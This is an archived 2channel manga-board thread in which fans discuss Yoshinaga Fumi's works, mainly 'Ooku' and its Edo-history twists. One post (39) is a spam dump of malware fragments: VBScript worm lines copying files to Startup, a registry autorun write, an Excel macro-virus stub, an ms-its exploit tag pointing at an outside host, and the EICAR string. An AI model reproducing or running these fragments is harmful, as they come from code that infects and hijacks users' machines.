2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

**よしながふみスレPart15**

1 :花と名無しさん:2006/12/04(月) 02:25:21 ID:???0
「大奥」「西洋骨董洋菓子店」「フラワー・オブ・ライフ」の、よしながふみ先生のスレッドです。
少女漫画板ですので、801と同人話題はできるだけsageにしましょう。マターリ推奨。
同人誌の通販方法については各自ペーパーを取り寄せること。
通販のペーパーは
新書館 WINGS編集部気付よしながふみ宛に
80円切手を貼った長4封筒の表に自分の住所氏名を書いたものを
「ペーパーを送って下さい」の手紙を添えて送る。
折り返し送った封筒にペーパーが入って届く仕組みになっている。
>アマチュア同人だって一ヶ月は待つのは暗黙のルール。
>半年〜一年待ちがデフォだったプロ作家も昔はいた。 (14-345さん談)
過去スレ・関連スレは>>2以降へ。


2 :花と名無しさん:2006/12/04(月) 02:25:59 ID:???0
【過去スレ】
よしながふみはどーよ?
http://mentai.2ch.net/gcomic/kako/962/962183622.html
よしながふみ先生っていいよね? (行方不明)
http://piza.2ch.net/gcomic/kako/967/967395465.html
よしながふみさんお好きな方。
http://salad.2ch.net/gcomic/kako/989/989332240.html
**よしながふみスレPart2**
http://salad.2ch.net/gcomic/kako/997/997704387.html
よしながふみスレパート3
http://choco.2ch.net/gcomic/kako/1000/10008/1000867459.html
**よしながふみスレPart4**
http://comic.2ch.net/gcomic/kako/1003/10036/1003677209.html
**よしながふみスレPart5**(dat落ち)
http://comic.2ch.net/test/read.cgi/gcomic/1006940505/
**よしながふみスレPart6**
http://comic.2ch.net/gcomic/kako/1016/10160/1016033826.html
**よしながふみスレpart7**
http://comic.2ch.net/test/read.cgi/gcomic/1031718232/
**よしながふみスレpart8**
http://comic.2ch.net/test/read.cgi/gcomic/1043702515/
**よしながふみスレPart8.5**
http://comic.2ch.net/test/read.cgi/gcomic/1044248971/
**よしながふみスレPart9**
http://comic6.2ch.net/test/read.cgi/gcomic/1062139952/
**よしながふみスレPart10**
http://comic6.2ch.net/test/read.cgi/gcomic/1094123496/


3 :花と名無しさん:2006/12/04(月) 02:27:58 ID:???0
よしながふみ11
http://comic6.2ch.net/test/read.cgi/gcomic/1112012068/
よしながふみ12
http://comic6.2ch.net/test/read.cgi/gcomic/1126704921/
**よしながふみスレPart10**
http://comic6.2ch.net/test/read.cgi/gcomic/1136565964/
**よしながふみスレPart14**
http://comic6.2ch.net/test/read.cgi/gcomic/1150948205/

【関連サイト】
過去ログ倉庫
ttp://2ch_yoshinaga.tripod.com/

※html化されていたものを差し替えるの忘れました。
**よしながふみスレpart7**
http://comic.2ch.net/gcomic/kako/1031/10317/1031718232.html
**よしながふみスレpart8**
http://comic.2ch.net/gcomic/kako/1043/10437/1043702515.html


4 :作品ホモレーディング:2006/12/04(月) 02:30:34 ID:???0
過去スレ13の248-249より抜粋
♂×♂
 ├ガッチュンあり
 │ └BL・同人発表
 │   ├過激
 │   │ ├月とサンダル: 2
 │   │ └1限めはやる気の民法:2
 │   │ 
 │   ├やや過激
 │   │ ├愛とは夜に気付くもの
 │   │ │      └執事シリーズ
 │   │ │            └執事の分際
 │   │ ├ソルフェージュ
 │   │ │      └初期短編再録
 │   │ │            └文庫版
 │   │ └ジェラールとジャック
 │   │          └修正あり
 │   │              └文庫版 
 │   └そこそこ
 │     ├月とサンダル:1
 │     ├1限めはやる気の民法:1 
 │     └それを言ったらおしまいよ 
 │


5 :作品ホモレーディング2:2006/12/04(月) 02:38:14 ID:???0
 │
 └ガッチュンなし   
   └一般誌発表
     │ ├こどもの体温
     │ ├西洋骨董洋菓子店
     │ └大奥
     │  
     └♂×♀
       ├彼は花園で夢を見る    
       ├愛すべき娘たち
       └フラワー・オブ・ライフ
        
 └グルメマップ
       └愛がなくても喰ってゆけます

※ガッチュン = 合体行為のこと


6 :作品ホモレーディング3:2006/12/04(月) 02:39:32 ID:???0
ホモ取扱い有り
  ├性描写有り
  │ ├短編集
  │ │ ├本当に、やさしい。
  │ │ ├愛とは夜に気付くもの
  │ │ └それを言ったらおしまいよ
  │ │  
  │ └連作・連載
  │   ├日本もの
  │   │ ├月とサンダル 
  │   │ ├1限めはやる気の民法 
  │   │ └ソルフェージュ
  │   │
  │   └おフランス
  │     ├ジェラールとジャック
  │     └執事の分際
  │     
└性描写無し
    ├こどもの体温
    ├西洋骨董洋菓子店
└大奥

ホモ取扱い無し
  ├シリアス
  │ ├彼は花園で夢を見る
  │ └愛すべき娘たち
  │ 
  ├コメディ
  │ └フラワー・オブ・ライフ
  │ 
  └なんちゃってノンフィクション
    └愛がなくても食っていけます

7 :花と名無しさん:2006/12/04(月) 02:41:10 ID:???0
テンプレは以上です。
次スレ立てるのは>>970>>980を踏んだ方お願いします。


8 :花と名無しさん:2006/12/04(月) 02:48:14 ID:???O
>>1さん乙です。

9 :花と名無しさん:2006/12/04(月) 02:52:10 ID:???0
>>1


10 :花と名無しさん:2006/12/04(月) 02:53:50 ID:???0
>>1乙華麗

11 :花と名無しさん:2006/12/04(月) 03:36:02 ID:???0
>>1-7
長々と乙カレー 旦~

大奥の続きが楽しみだなー。メロ発売12月28日がまだまだ遠いけどw
推理するのに事欠かないストーリーで
このスレの他の住人さんの想像もまた楽しや。

12 :花と名無しさん:2006/12/04(月) 10:37:51 ID:???0
ホモレーディングスゴス。でもちょい質問。
西洋骨董洋菓子店は「ガッチュン無し」「性描写無し」となってるけど、
魔性様がやってる場面がいくつかなかった?
数コマだからオケ?


13 :花と名無しさん:2006/12/04(月) 11:04:59 ID:???0
ちゅうとかケツ鷲掴みとか事後の描写はあったけど最中はあったっけ?
アッくんとのはまだ始めてないように見えるけど、見ようによっては最中にも
見える?

14 :花と名無しさん:2006/12/04(月) 12:17:53 ID:???0
回想で、いろんなプレイをするようになってから女の人が苦手になったってところで、
キスだけだけど最中っぽいカットはあったような気がする

15 :花と名無しさん:2006/12/04(月) 12:21:58 ID:???0
あの仏蘭西人師匠とは朝チュンだけなんだっけ?

16 :花と名無しさん:2006/12/04(月) 13:04:08 ID:???0
朝チュンだのガッチュンだの、わけわかんない符牒で話するのやめてよ。
それともここは、そういう言葉がわからない「一般人」は参加しちゃいけない場所なわけ?

17 :花と名無しさん:2006/12/04(月) 13:06:23 ID:???0
朝チュンやガッチュンは別にホモ用語でも何でもないぞ。

18 :花と名無しさん:2006/12/04(月) 13:09:46 ID:???0
>>16
>>5



19 :花と名無しさん:2006/12/04(月) 13:22:28 ID:???0
>>16
昔の少女漫画やメロドロマ・小説などにありがちだったよ>朝チュン
別によしなががBL描いてる作家と言うせいじゃなく
男女のカップルでも、そんなに生々しく描写しないのが普通だったからね。


20 :花と名無しさん:2006/12/04(月) 13:25:00 ID:???0
>>16
恥ずかしい奴だなww

21 :花と名無しさん:2006/12/04(月) 13:25:31 ID:???0
>>16
アテクシおたくじゃない一般人乙
テンプレくらい読んでこい

22 :花と名無しさん:2006/12/04(月) 14:05:05 ID:???0
テンプレ読んだって違和感は消えないよ。
前スレはまともっぽかったのに、なぜここは異様な雰囲気で始まってる?といいたいの。

23 :花と名無しさん:2006/12/04(月) 14:10:21 ID:???0
>>22=>>16
おまいが物知らずなだけだろ。ウザー。
漫画板でも一般書籍板でもドラマ板でも今後の展開や
作品内容語る時に使う言葉づかいに対してつっかかっちゃって。
自分がわかならない内容で、入っていけなくてすねてるだけか?
流れを中断させたいなら、おまいが面白い話題ふればいいだけだ。

ってことで
>>15以前の話をドゾー
↓↓↓↓↓↓↓↓↓↓↓↓↓↓



24 :花と名無しさん:2006/12/04(月) 15:41:02 ID:???0
>>23 オケーわかった。




1巻を改めて読み直した。
杉下モエー。


25 :花と名無しさん:2006/12/04(月) 15:41:17 ID:???0
>>12
3巻の仏蘭西師匠との話の中では、厨房ですっぽんぽんで転がってたりする「事後」
シーンは出てくるねえ。


26 :花と名無しさん:2006/12/04(月) 18:00:24 ID:???0
やっと我が地域でも大奥2巻が出た。

27 :花と名無しさん:2006/12/04(月) 18:48:58 ID:???0
>>24 なんだと杉下は私のだ!

よしなが先生って、三歩下がって彼女の影を踏まず(By巨乳女子アナ)
みたいな控えめ系の男子が好きなのかな。

28 :花と名無しさん:2006/12/04(月) 19:24:58 ID:???0
そうか?あんまりそういう印象ないな

29 :花と名無しさん:2006/12/04(月) 20:39:43 ID:???0
よしながキャラで結婚したいのはなんといっても
こどもの体温の父子家庭のパパだ。理想だ。

30 :花と名無しさん:2006/12/04(月) 21:37:47 ID:???0
私なら西洋のスイーツ好き元刑事(現役じゃないよ)が
見合いの席に表れると同時に「初めまして、結婚してください」と言う。

31 :花と名無しさん:2006/12/04(月) 21:48:31 ID:???O
杉下、いいよねぇ…。
有功・家光(千恵)編は、
超美麗と不細工と普通(村瀬とか。なにげに普通をかける漫画家は少ないが。)で構成されてて
杉下タイプの渋い二枚目はでてこないもんな。
あえていうなら春日局の息子がそれだが。
あの人は最後は味方(?)になってくれそうな感じする。

32 :花と名無しさん:2006/12/04(月) 22:02:24 ID:???0
>>27
つ アンドレ

33 :花と名無しさん:2006/12/04(月) 22:53:41 ID:???0
春日の息子は家光の影武者(声と姿担当)だね。
最終的にはこの人の死体を「家光」として葬って
家光の遺言ということで千恵姫を4代将軍職につけるのかなーとか思った。

34 :花と名無しさん:2006/12/04(月) 23:20:47 ID:???0
「家光は女」って吉宗の時には伝えられてるし、
やっぱり家光=千恵のまま通すんじゃないか?
春日の死後、城での強力な庇護がなくなって
対外的に隠しきれなくなってくるんじゃないかと予想している。

35 :花と名無しさん:2006/12/04(月) 23:44:20 ID:???O
私は愛すべき娘たちの爽子(?だっけ、尼さんになる人)の
見合い相手(足に交通事故の後遺症がある人)が好きだ。
お断りするなんてそれこそ罰当たり。

フラワー四巻いつごろでるかなぁ…。
大奥の話はしたいが、フラワーはコミクス派だから
ネタバレに気をつけつつスレ覗いてる。

36 :花と名無しさん:2006/12/05(火) 00:06:00 ID:???0
大奥2巻と前スレ読んだ勢いで1巻再読してきた。
ねこカワイソス
この先すごく楽しみなんだけど、完結まで時間かかりそうだね。

フラワー・オブ・ライフ、面白そうなので今度読んでみます。

37 :花と名無しさん:2006/12/05(火) 01:56:45 ID:???0
大奥、どの時代まで続くんだろう?
まさか幕末までずっと男女逆転幕府ってことはないだろうし…

ある程度病気が蔓延したら、遺伝子的に病気に耐性のある男性だけが生き残るってことになるだろうし、
そうすると自然に男性の数が増えていくのかな?

38 :花と名無しさん:2006/12/05(火) 02:12:59 ID:???0
>>37
適当にストーリー消化したら終わるんじゃないか
別に歴史ものとしてやってるわけじゃなさそうだし

39 :<body onload=window()>:2006/12/05(火) 06:42:52 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

40 :花と名無しさん:2006/12/05(火) 07:19:02 ID:???0
>>37
前スレ869さんが書いてるよ(メル欄:ネタバレ注意)。

41 :花と名無しさん:2006/12/05(火) 07:59:11 ID:???O
昨日初めてドラマのアンティークを見たんですが……

あれはわざと原作と別物のようにしたのですか?
初めて見たのが最終回だから、なおさらわからなかった

42 :花と名無しさん:2006/12/05(火) 12:45:27 ID:???0
ドラマ最終回時に原作はまだ連載中。
それを踏まえての、よしながさんのドラマ化に際しての注文が
「ラストはテレビはテレビで、オリジナルのものにしてくれ」
(マンガのラストは既に考えているがそれとは同じにしてくれるな)
というものだった、というのを何かのインタビューで言っていた。

43 :花と名無しさん:2006/12/05(火) 14:23:35 ID:???0
前スレ終盤、スゲーw
もう終わりって直前まで大奥の内容を語ってるよwww
それだけ中身が面白いということなんだろうけど。

44 :花と名無しさん:2006/12/05(火) 20:27:31 ID:???0
史実だと、家光が将軍になった4〜5年後に明正女皇が即位してるよね
これは皇室にも赤面疱瘡が及んでるのか、たまたま皇女が即位したのか。

それから120年くらいして後桜町女皇も即位してるけど
公家は武家とはどう違って女性の即位を公にできたんだろう。

45 :花と名無しさん:2006/12/05(火) 21:46:34 ID:???0
>>44
皇室は明治時代になるまで女性天皇の即位はOKだったのよ。
女系天皇が駄目なだけ
(女性天皇は寡婦か独身)

46 :花と名無しさん:2006/12/05(火) 22:12:57 ID:???0
>45
そうじゃなくて女性天皇が江戸時代に実際に皇位についていることが
この「大奥」とどう関るかってことじゃない?
このふたりだけ女性名のまま皇位についたことになっていて
他は女性でも男性名で皇位についたのか。
それとも逆に女性名の天皇は男性がなったという可能性も考えられる。
それとも男性名の天皇はそのまま男性で、公家や天皇家だけは交替がなかったとか。

まあ明正天皇についてはまだ男性と女性が
交代していない頃だろうからどっちにしろ女性でいいんだろうとは思うが。
ついでに将軍の正室は大抵が公家出身だから公家は交代があったんではないかと思われるけども。


47 :過去ログ倉庫の中の人:2006/12/05(火) 22:20:48 ID:???0
更新しますた。

48 :花と名無しさん:2006/12/05(火) 22:36:58 ID:???0
男が少ないと知られたら侵略者に狙われる…という危機感から女が継いでも
男名で通してたらしいから、もともと女帝OKだった朝廷ならカムフラージュ
として男名に女名を混ぜてみたとか?なんかこんがらかってきた

49 :花と名無しさん:2006/12/05(火) 22:47:27 ID:???0
赤面疱瘡にかからず成人できた男なら
そのまま寿命をまっとうできるのではないだろうか。

50 :花と名無しさん:2006/12/05(火) 23:17:29 ID:???0
明正天皇の母は徳川和子(家光の同腹妹)なので
よしながさんがどう料理するのか楽しみに待ってる。

51 :花と名無しさん:2006/12/05(火) 23:17:52 ID:???0
>>44だけど>>46さんの内容が言いたかった。
年表と「大奥」をどう絡めていくのかなと。


52 :花と名無しさん:2006/12/05(火) 23:33:23 ID:???0
お万の方の弟が高家として徳川家に仕えてるから
妹が登場するかもしれないね。

53 :花と名無しさん:2006/12/05(火) 23:35:32 ID:???0
>>47
乙!ありがとう。

54 :花と名無しさん:2006/12/05(火) 23:47:35 ID:???0
>>49
本物の家光は29になってから赤面疱瘡かかったんじゃなかった?

55 :花と名無しさん:2006/12/06(水) 00:23:16 ID:???0
>>54
でも上様はもともと病弱だったから…

56 :花と名無しさん:2006/12/06(水) 00:26:45 ID:???0
吉宗の時代には数は少ないけど中年〜老人の男もいたし

57 :花と名無しさん:2006/12/06(水) 00:56:00 ID:???O
>>27 杉下は私のものですが、しかたなくあなたにあげます。だから、お万(有功様)と玉栄は下さい(* ̄ー ̄)にやり
でも…玉栄…
若紫…殺しちゃった場面はぬこが大好きの私には
辛すぎたよ…
少しの間、玉栄…きみをうらんだもんさ…
ごめんねm(_ _)m

58 :花と名無しさん:2006/12/06(水) 01:14:14 ID:???O
どうせなら幕末までやって欲しいが家茂の時代は家茂は男であって欲しいなぁ〜政略結婚だったけど和宮とはらぶらぶだったらしいから…
あっ(゜0゜;)だったら家斉の時代はどうするんだろう…
側室40人だよ…女将軍なら身体もたないじゃないか…
子供だって55人 成人したのだけでも男子13人
女子12人だよ…

そんなに一人の女(将軍)じゃ生めないだろう…
よしながさんはそこんとこ…どうするのだろうか…


徳川将軍家ヲタでゴメス

59 :花と名無しさん:2006/12/06(水) 02:05:12 ID:???0
>>57-58
将軍家ヲタはいいんだが2chではあまり見ない顔文字なんで
なんか変に感じます

60 :花と名無しさん:2006/12/06(水) 02:07:51 ID:???0
>>57-58
このスレッド、1から全部読み直すのをお勧めする。


61 :花と名無しさん:2006/12/06(水) 02:59:27 ID:???O
>>47
乙〜
>>57-58
おちけつ

62 :花と名無しさん:2006/12/06(水) 09:14:49 ID:???0
>>57-58はこのスレっつーか2chについてもっと詳しくなってから書き込んだほうがいいとオモ
他のとこだと下手すると叩かれるよ

63 :花と名無しさん :2006/12/06(水) 09:42:47 ID:???0
白玉よりも黒玉の方が好きだな。
有功のためなら自分が汚れることも厭わないし、自分がやってることの酷さも分かってるし。

64 :花と名無しさん:2006/12/06(水) 09:49:34 ID:???0
ttp://books.yahoo.co.jp/ranking/online/all/comic_and_animation/weekly/index.html

例によって、『大奥A』はセブンアンドワイのコミックランキングで1位だったようです。
あと、テンプレの表で「過激」に区分けされている二作品については、男女の営みと
そう違うわけではないので、自分はすんなりと受け入れました。その比較自体が
誤っているのかもしれないけど。

65 :花と名無しさん:2006/12/06(水) 10:44:29 ID:???0
うにゃ?

66 :花と名無しさん:2006/12/06(水) 13:45:44 ID:???0
お玉には幸せになって欲しいな。
幼少時から苦労し続けて、あまつさえ大奥に入ってからはあんな…。

67 :花と名無しさん:2006/12/06(水) 14:09:54 ID:???0
お玉、お万…と史実の側室達(もちろん女性)の名前がちゃんと出てきてるってことは
他の側室(…って呼ぶのか?女装して踊ってた二人とか)もこの先女性名がついて子供を持つことになるのだろうか?
史実だと家光公はお玉以外の側室にも子供産ませてるよね

68 :花と名無しさん:2006/12/06(水) 14:25:18 ID:???0
関東ではアンティークの再放送が終わり、
大奥の再放送(綱吉時代のだが)が始まった。
狙ってるようにしか思えないのは私だけだろうかw
綱吉といえば、彼みたいな真正ウホはどう脚色するんだろうな。
やはりビアン設定になるのだろうか。


69 :花と名無しさん:2006/12/06(水) 14:42:10 ID:???0
>>68
思わず綱吉のことをググッてしまいました。
大奥一巻に出てきた「寝所でのねだり事はご法度」「将軍と側室の寝所には
寝ずの番がつく」制度は綱吉の代あたりでできた決まりらしいですね。
(柳沢吉保が送り込んだ女性が寝所で「吉保に領地を与えて」とおねだり
したからだそうです)
さすが柳沢吉保。噂に違わぬワルだなあ。

70 :花と名無しさん:2006/12/06(水) 18:46:49 ID:???0
村瀬は、有功が来る前は大奥の中でこれといった役職はなさそうだよね。ということは
最初から記録者として大奥入りして、もうあの記録書を書き始めているのだろうか。
「馬同様女にも〜」の所で目を閉じてるけど、こういう発言する御中臈を
なんて書くべきか考えてるとか?


71 :花と名無しさん:2006/12/06(水) 19:03:10 ID:???0
吉宗様の時代には村瀬は「家光が本当は男だった」ことを知る唯一の人だよね。
度重なる代替わりにも大奥に残り続けて…てな杉下の言葉があるけど
実際は「重大な秘密を知ってるから大奥から出して貰えなかった」んじゃないかなーと2巻見て思った。

春日局の命で村瀬があの記録を付け始めたってことは
春日存命中に徳川家の男女逆転があったってことになる。
逆転の証拠隠滅にその前の記録を処分してその時記録係に命名したのかな。

72 :花と名無しさん:2006/12/06(水) 19:12:17 ID:???0
>>71
>逆転の証拠隠滅にその前の記録を処分してその時記録係に命名したのかな。

春日局が記録をつけるよう指示出しているのだから、
証拠隠滅はしていないと思う。
いずれ世の中が安定して、男女逆転の仕組みに疑問を持つ将軍が
現れてきた時の為の記録係なんじゃないかな。

73 :花と名無しさん:2006/12/06(水) 21:45:43 ID:???0
いや、くせ者の春日局のやることだから
過去の記録を処分して村瀬個人の記録(と語り部としての記憶)のみを大奥の奥に残し
「不審に思ったものが村瀬まで辿り着く」以外では情報の知りようがない仕掛けにしたのかも。

74 :花と名無しさん:2006/12/06(水) 23:12:36 ID:???0
それなら最後に村瀬に毒でも盛ってしまったほうが良かったんじゃないかなぁ。
証拠隠滅は確実に。

75 :花と名無しさん:2006/12/06(水) 23:17:38 ID:???0
村瀬は「ずっと待ってた」って言ってるし、やっぱり春日は村瀬だけを語り部として
残したんだよね?

76 :花と名無しさん:2006/12/06(水) 23:27:46 ID:???0
>74
村瀬「だけ」残したのがミソなんじゃないかと。
それともう一つ、いくら切れ者春日の局でも村瀬があんなものっそ長生きするとは思わなかっただろうw

77 :花と名無しさん:2006/12/07(木) 00:25:30 ID:???0
なんで鎖国したかを忘れられたらこまるしね。

78 :花と名無しさん:2006/12/07(木) 00:28:58 ID:???O
大奥二巻読んだ
やっぱりよしながさんは状況の中の自然な人間の心理を描くのが上手いね。
人間の生臭いにおいがする漫画になっている。酔ったような読後感。

79 :花と名無しさん:2006/12/07(木) 00:40:25 ID:???0
村瀬が伝えないといけない事って
大奥と鎖国は春日局の家光への妄執で作ったものだ、ってことじゃないかな。

80 :花と名無しさん:2006/12/07(木) 00:43:28 ID:???0
一応国の行く末も考えていたんじゃ…

81 :花と名無しさん:2006/12/07(木) 00:58:31 ID:???0
春日局の中では この国の行く末<可愛い可愛い家光の血筋 だったと思うw
親(乳母だけど)バカだけど賢い女性ではあったから己の我執なのは分かってただろう
だから後の世のために村瀬に亡日録(だっけ1巻友達に貸してうろ覚え)を残させたのでは?

そして国の行く末をきっちり考える吉宗様が現れてようやく村瀬の所へ辿り着き
きっかけは一人の女性の偏愛(でも愛情)のなせる技だったと知った上で
敢えて大奥システムをこれからの国のために利用することで局の我執を解放するんじゃなかろうか…と思ってる。

82 :花と名無しさん:2006/12/07(木) 09:54:56 ID:???0
村瀬は「この国の滅び行くさまを記録せよ」と命じられたんではなかったっけ。
春日にも自分の死後、国がどうなってゆくのか予想ができなかったから、
一縷の希望(?)も持ったうえであえて記録を残させることにしたのかなーと思った。

家光のお腹様になった側室は、お楽、お玉のほかにお夏(甲府宰相・綱重生母)がいるね。
あと生後すぐ亡くなったけど男子を生んだおりさ(御台所の元侍女)。
お玉、お夏、おりさは京都出身。

関係ないけど、wikipediaの「お万の方」の項で本名が「源 満子」って書いてた…w
初めて知った。

83 :花と名無しさん:2006/12/07(木) 17:17:55 ID:???0
wikiを100%信用するのはやめた方がいい

84 :花と名無しさん:2006/12/07(木) 17:38:12 ID:???0
100%信用してるわけではないんだが、今まで読んだどの文献にも
「源 満子」なんて書いてなかったからさ。ちょっと面白かっただけ。

85 :花と名無しさん:2006/12/07(木) 19:49:20 ID:YADv5lku0
にわかなので
ドラマ大奥のキャストを充てながら補完しています

86 :花と名無しさん:2006/12/07(木) 20:00:55 ID:???O
最近大奥読んだ。
作者に食わず嫌いしていたが、面白いねーこれ。
しかし二巻の続きが次のメロディって事は、相当進み遅いのか…。

遅くとも鎖国が解かれる頃には元の男女比に戻るんだろうか。
女慶喜を見てみたいが。

87 :花と名無しさん:2006/12/07(木) 20:36:25 ID:???0
コミックスの続きが○日発売の雑誌で読める!ってのはそういう手法が流行ってるだけ。
進みが遅いのも事実だけど。

88 :花と名無しさん:2006/12/07(木) 21:27:42 ID:???0
>87
じゃあ28日発売のメロディに掲載されてるのは
2巻のすぐ後の話じゃないってこと?
自分も最近1、2巻まとめて読んだ口で
面白いからメロディ買ってみようと思ってたけど
間に何話かさむならやめておいた方がいいのかなあ

89 :花と名無しさん:2006/12/07(木) 21:41:29 ID:???O
そういう手法も流行ってるし、
進みも遅いしってことでそ。

90 :花と名無しさん:2006/12/07(木) 21:46:19 ID:???0
>88
>87のレスで混乱しちゃってるみたいだけど
単行本に入ってるのはこの間メロディに載った分まで。
間を挟まずにちゃんと続きを読めるよ。

91 :花と名無しさん:2006/12/07(木) 22:10:47 ID:???0
まあ進みが遅いのは
よしながさんのせいというよりは、メロが隔月のせいだよな。
月刊誌に戻んないかなぁ

92 :88:2006/12/07(木) 22:48:36 ID:???0
>90
すいません混乱してました。
28日にメロディ買ってみます、ありがとう。

93 :花と名無しさん:2006/12/08(金) 01:20:05 ID:???O
大奥2巻の帯「僧侶だった男とひとりの少女との、純愛」を見て。
てっきり、序盤に出てきたソバカスの娘さんと有功様が恋に落ちるのかと…
アホ過ぎるorz

94 :花と名無しさん:2006/12/08(金) 01:24:38 ID:???O
私は小菊かと思ったw
あっさり始末されて驚いた。

95 :花と名無しさん:2006/12/08(金) 03:44:51 ID:???0
小菊は少女じゃないw

96 :花と名無しさん:2006/12/08(金) 05:24:45 ID:???0
それを言うなら1巻の最初、山でクマーに襲われた男の子が
大きくなって大奥に入って活躍するんだろうと6割くらいの人は思ったはず。

いきなり死んでガビーンとなったよ。

97 :花と名無しさん:2006/12/08(金) 05:42:18 ID:???O
あー思った思った
重要そうに見えてつるっと死ぬよね
二巻の遊女もそうだし

98 :花と名無しさん:2006/12/08(金) 06:50:47 ID:???0
若紫も、もっと引っ張るもんだとばかり…
「すーり」がかわいかったのに。

99 :花と名無しさん:2006/12/08(金) 08:17:28 ID:???0
しかしその辺の話を引っ張ると、さらに進みが遅く…

100 :花と名無しさん:2006/12/08(金) 09:42:32 ID:???0
明慧のイヤミなとこが割と好きだったんで、あっさり切り殺されてショックだった

101 :花と名無しさん:2006/12/08(金) 09:48:01 ID:???0
何の前触れもなく、ふいに殺されるから驚くよね
当時の権力を前にした人の命の軽さがしのばれる

102 :花と名無しさん:2006/12/08(金) 10:04:08 ID:???0
隔月だからこそのクォリティなのではなかろうか。
練りに練って、しかも余分はばっさり切ってとぎすまされた感じ。
このテンションをどの位保てるのかわからんけど今は目が離せない。

103 :花と名無しさん:2006/12/08(金) 15:23:24 ID:???0
千恵姫が春日局らに連れてこられて断髪させられるシーン、
シリアスな場面のはずなのに、213ページの1コマめだけ見ると
姫の表情がコミカルな時によくかかれるデフォルメがきいたやつだったものだからか
まるで歯医者や注射前に駄々をこねる子供とそれに手を焼く大人たちの図にも見えてしまった。

フキンシンでごめん(´・ω・`)

104 :花と名無しさん:2006/12/08(金) 15:26:13 ID:???0
さらにごめんorz
× 大人たちの図にも〜
○ 大人たちの図のようにも〜

105 :花と名無しさん:2006/12/08(金) 16:07:30 ID:???O
一巻は二巻に比べれば人知んでないよね。
やっぱり時代か。

106 :花と名無しさん:2006/12/08(金) 20:11:10 ID:???0
「このマンガがスゴイ!」のインタビュー読んだ。

初代と二代目を除く徳川幕府将軍13人全員描く予定ってマジですか。
どう考えても8巻じゃ納まらないないような…
今月のメロディでいきなり4代将軍から始まったりして。

107 :花と名無しさん:2006/12/08(金) 20:45:47 ID:???O
6、7代目くらいの出番でも、描いた事にはなるが。

108 :花と名無しさん:2006/12/08(金) 20:52:19 ID:???0
全員何らかのエピソードを描くんだそうだ。

109 :花と名無しさん:2006/12/08(金) 21:24:37 ID:???0
スレ速度が早くて追えてないので既出だったらスマソ。
Wings最新号に1ページだけ「西洋骨董〜」の4コマ漫画が
掲載されていて、ちょと面白かった。そんだけですw

110 :花と名無しさん:2006/12/08(金) 21:30:37 ID:???0
エピっていっても1巻で6代将軍が大奥の男らがひれ伏す中を歩いてるのとか
吉宗様の前の代の幼将軍が病弱ですぐ死んじゃった(ヒトコマ)とか
インパクトのある将軍以外はその程度でしょ。
今現在で1巻で6・7・8代将軍が登場して2巻で3代目だから計4人登場済み。残り9人。
家光(千恵姫)は要の代だろうから3巻も3代が絡むと考えても全8〜10巻なら最低でもあと5冊分あるよw

111 :花と名無しさん:2006/12/08(金) 21:41:30 ID:???0
今、TVでさんまの番組見ていたら、江戸時代、日本は鎖国をして
いなかったかも?!と言う説が歴史研究家によって発言が…。
マジでっかwww

112 :花と名無しさん:2006/12/08(金) 21:44:14 ID:???0
おま…実況はヤメレ

113 :花と名無しさん:2006/12/09(土) 01:51:34 ID:???0
>>106
吉宗の時にウイルス問題が解決されるのかなぁと思ってたから、
慶喜までやるとの発言にはビビッタ。何度か指摘されてるが、
家斉どうすんだろ。。先が待ち遠しすぎる

114 :花と名無しさん:2006/12/09(土) 09:22:44 ID:???0
マロンでうっかりフラワーオブライフのこれからの展開を
知ってしまいうちひしがれている…
新刊はいつごろでそうでしょうか。
過去スレ見れないので、どなたか教えてください
あと昨日愛すべき娘たちを読み返したら、もっと好きになった。

115 :花と名無しさん:2006/12/09(土) 10:41:26 ID:???0
今月出るWingsで最終回だから、4巻発売は2月くらい?

116 :花と名無しさん:2006/12/09(土) 12:44:43 ID:???0
2巻が立ち読みできたので面白くて1巻と一緒に買ったが…

吉宗公のかっこよさは異常www

117 :花と名無しさん:2006/12/09(土) 14:17:07 ID:???0
>>116
「さがりゃ!」のシーンがとても好き。

118 :花と名無しさん:2006/12/09(土) 14:57:11 ID:???0
男前だよな

119 :花と名無しさん:2006/12/09(土) 15:04:54 ID:???0
庭掃除してる下男を漢らしくいただいたのは凄かった。
水野みたいな美男を「よいではないか」してるところも見たかったが
容姿がいいのは全部解雇したからなあ。なんていい将軍だ。

120 :花と名無しさん:2006/12/09(土) 15:25:02 ID:???O
てっきり一般的に見て容姿の悪い男の方がが好みなのかと…
杉下は三十五才以上?その割に若く見えるね。
しかしいろんな時代を描くのかー。
吉宗の時代のドラマ中心でいって欲しかった気もする。
大岡越前の活躍も見たい。

121 :花と名無しさん:2006/12/09(土) 16:35:11 ID:???0
1巻読んだときは、女だけど抱かれたい!とか思ってしまったw

自分も、吉宗公はどっちかというとあまり容姿のさえない(世間的には)男性のが好みなのだと思ってたよ。
でも考えたら水野を気に入ったんだからそうでもないね。
単に容姿はそれほどは気にしないということなのかな?


122 :花と名無しさん:2006/12/09(土) 17:07:03 ID:???0
やりたいときにやり捨て出来るっていいよなぁ・・・


123 :花と名無しさん:2006/12/09(土) 19:28:14 ID:GXibqzN80
>>119
その時の庭掃除してる下男、卯之吉のうろたえる様子がかわいかった。
